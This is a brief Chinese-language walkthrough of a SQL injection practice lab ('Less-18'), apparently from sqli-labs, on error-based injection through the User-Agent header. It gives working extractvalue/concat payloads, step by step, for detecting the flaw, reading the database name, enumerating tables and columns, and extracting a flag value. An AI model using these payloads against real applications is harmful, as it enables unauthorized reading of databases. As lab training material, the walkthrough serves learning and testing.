Less-18

Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理，头部POST注入)

需要登录成功

1.判断是否存在注入

User-Agent: '

2.查看所在数据库和数据库版本

User-Agent: ' and extractvalue(1,concat(0x7e,database(),0x7e)) and '

3.查看数据库的表

' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)) and '

4.查看B8COTOy3表中的列

' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='B8COTOy3' limit 1,1),0x7e)) and '

5.查看表中的flag列中的数据

' and extractvalue(1,concat(0x7e,right((select flag from B8COTOy3 limit 3,1),31),0x7e)) and '